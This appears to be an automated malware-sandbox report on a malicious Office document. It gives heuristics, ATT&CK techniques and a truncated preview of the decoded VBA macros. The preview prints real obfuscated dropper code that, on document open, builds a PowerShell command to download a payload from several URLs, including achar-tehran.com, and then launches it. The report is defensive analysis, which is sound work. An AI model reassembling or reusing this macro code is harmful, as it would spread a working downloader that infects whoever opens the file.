MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious OLE document containing VBA macros. A critical heuristic firing indicates the use of the Shell() function, commonly used to execute downloaded payloads. The AutoOpen macro suggests immediate execution upon opening. The reconstructed URL 'http://achar-tehran.com/aIwM/' is likely the source of the second-stage payload.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 130,731 bytes but its declared streams total only 24,491 bytes — 106,240 bytes (81%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 47778 bytes |
SHA-256: 9f353c8cde53f31edd1517d0221c19799e869699d56276522cbec577563d3a4f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "EQkYTQZMUP"
Function jKwnsPwmjVchZ()
FNHINDLsQtI = Array(UCase("ivdYnBDiBTY" + "mcLmbQYLzEiYa" + "uzbdMwslP" + "dkHUofWX" + "lSqdKjnkijZQE"))
dwlYZTcl = Mid("1SRwLJuJFlJON6pNCiCz3DXZa071smEUOKcspemenankKc+kKcg.comkKc+EUO+EUOkKc/kKc+kKcMAkKc+kKchq/,'+'h'+'tt'+'p:/kKc+EUO+EUOkKc/wwwEUO+EUO.achar-tehrkKc+kKc'+'an.kKEUO+EUOc+kKccom/aIwM/,hkKc+kKctjwM5SpKvv", 31, 157)
KllJsiVCR = Array(UCase("UdGPpCpjd" + "EWPtjKuEIcV" + "ETNmYoQEnRuEG" + "uVsJXrRi" + "TpzLDIu"))
UBXjujihTP = Array(UCase("ZHGCXGbABMDJqI" + "XTiGfpv" + "TRtZMKE" + "rYmiNicwRRkQd" + "AtijLMrJZId"))
CkFNZ = Array(UCase("ULDzduUi" + "jrGZdlaWjtzP" + "LLLTdAL" + "qcVpNnaFfBWqz" + "CMhldOhJd"))
JOTsD = Mid("VzdCvjRhsdEwBjqUjlw02),[StrIng][cH'+'ar]39).rePlaCE(([cHar'+']HpE7hIb", 21, 42)
RNzvrEjzau = Array(UCase("mlihPqz" + "LlEaqorjpN" + "iZsQAuj" + "rwhzdEJvrUjCtT" + "PPoDpWV"))
fzSmMIjcdBi = Array(UCase("sOzsnKQTSv" + "PkjQwARBrdZIt" + "wmsXzJhw" + "zzohRVk" + "XBZmcwV"))
rJzzWcXfNGz = Array(UCase("QciRRwmNTkBFms" + "DcIXcVXiuVzsG" + "ibSVodw" + "qMvukINKAPWZ" + "PEjtZsukv"))
qvocsBluIjI = Mid("0pEFBti4HVG9azzbkEUO+EUOKcreak;}catch{writkKc+kKce-hoskKc+kKctkKc+'+'kKc RJPkKc+kKc_.'+'ExckK6kK0Z9ZFnwBuPTZkDr", 17, 77)
WIlRmGqb = Array(UCase("NQHlsTFGjpY" + "wVmMQklRJS" + "fGbBHTWWnWrjtZ" + "HdthzczMF" + "PNWrMEV"))
FKYhAa = Array(UCase("FjNoIjjwP" + "VlwchkOVjUkVj" + "PXlcOkCwvupO" + "UEbRRGjzdH" + "LpdZAbh"))
MmqXD = Array(UCase("phEWwziskn" + "KzJPYzW" + "FwzkMvIzNV" + "CiAQQjnEkK" + "fijzlnMBQ"))
NkljcRmATlo = Mid("5zJEXtcTpKcEUO+EUOskKc+kKcukKc+kKcsa.ckKc+kKcok'+'Kc+kEU'+'O+E'+'UOKcm/wRhkKcEUbS", 10, 70)
dcXICSd = Array(UCase("zfYlzGjfoXqB" + "TNuQIDSPzkmPh" + "YGczUMFOr" + "TdKhbuamGRsbjI" + "XPUCvmVQpKYLZ"))
wwwNAqmBhX = Array(UCase("BrUaszrbq" + "RWNlUJi" + "fkslJrQSDNKUl" + "FJBrjqYm" + "duKwIQvibFTVfU"))
ubbOXHJiatL = Array(UCase("hCYlviFzOsPw" + "ZMVAWCREEQ" + "vjkDTPijMaWdZ" + "WiUwbwzN" + "YAdaUCGicmkq"))
zcQGdF = Mid("qmCe(([CHar]69+[CHar]85+[CHar]79),[strINg][CHar]39).rEPlaCe(([CHar]114+[CHar]104+[CHar]103),'|').rEPlaCe('OAE',[strCwhmjzqQiLzbDr4WS8kNMBjIDIj3Tdd", 3, 113)
OqVtNUqVTrq = Array(UCase("hcJZtdQVP" + "REkcdsU" + "oPrzvHBHiiPSqZ" + "lJDjwsSMZvqrM" + "CwMwbqFY"))
vSdAELoXk = Array(UCase("zCizJfmtD" + "vtzXzGdRqiwM" + "poOhGwt" + "pQIhRTcpSbpVS" + "jUiIYzUtHQlz"))
TRvwhH = Array(UCase("YOTJTwuNGkhD" + "QiIhDPOU" + "wibJkBDAMsZM" + "zJSjitPfNK" + "nrPGwzlhN"))
lvTrViazirS = Mid("wp0nZSc+kKc--prppwkVGij5TbPZw", 7, 8)
DJQitoWLZD = Array(UCase("LvzfwJqFdrqjm" + "bYHIqkI" + "tCzXuXwJ" + "vSfQuUvsLcbDd" + "cmwsUzHuOfDBv"))
YqwapYB = Array(UCase("SohKOtKFXpizw" + "zPUlUFGiTKWt" + "zCNGrwjfUkZQ" + "FZqVnnuhHjfAMI" + "jUWoUIMDKimA"))
VVtpFZzvSo = Array(UCase("MKWvUYNO" + "anhzEcOfamVlDL" + "bOYzobHNApfNc" + "AjJVjBTd" + "CCCdzrmYI"))
fcDzGMRmkD = Mid("zKYn74hC4VVk1H0Rs0KPvcQYIanC6{try{RJPk'+'Kc+k'+'Kcfranc.Downk'+'K'+'c+kKcloadFileEUO+EUO(RJEUO+EUOPabckKc+k'+'K'+'c.ToString(),kKc+kKc '+'RJPhuakKc+kKcskKc+kKc)kKc+kKc;kKc+k'+'KcInvoke-Item(RJPhuas)kKc+kKc;bkKc+YNrvGpv", 30, 182)
BaZAmn = Array(UCase("CiiuUVAjs" + "XizDpThGfqzvzN" + "wrsWjnAmifcE" + "jrIArXzFVEXk" + "bHKQHfQJYdI"))
KwftlbN = Array(UCase("dTGzQZVSahJZPl" + "ZGLPWKZwzV" + "mwJWNRWOzpujsw" + "itwHdnQH" + "lbImnDVJiW"))
ACqkqwtWXKd = Array(UCase("ZpMtXwLWB" + "abRUqQsZiTJOY" + "SQHqIDW" + "iHMpOzoLiDKfsr" + "vbPdsDRJKQ"))
uJEhzf = Mid("AFhjLRNWzCLBwc+k'+'Kcch(RJPabkKc+kKcc in RJPkKc+kKcbkKc+kKccd)Aq", 14, 49)
TpzhjBq = Array(UCase("WIDTsCAljfZST" + "bjCqrGVq" + "lmIkavUlCWIo" + "pcOamfasLI" + "aLWTTmPRfWShk"))
fbBJmSKaq = Array(UCase("bHpUOwUf" + "JHABtlSoFEtIau" + "PtZirNwB" + "DXhWJpLLNu" + "naNjHlcE"))
fWFHuRt = Array(UCase("MpIVdEQqjThwQ" + "bzAiCavH" + "VUirqPbSQ" + "GiLsAspniCArM" + "XWRNUnWsFbmB"))
SVZSdY = Mid("XJ4jzTAqlb-JOiN'') ( ('((EUO. ( Zk5pshO'+'
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.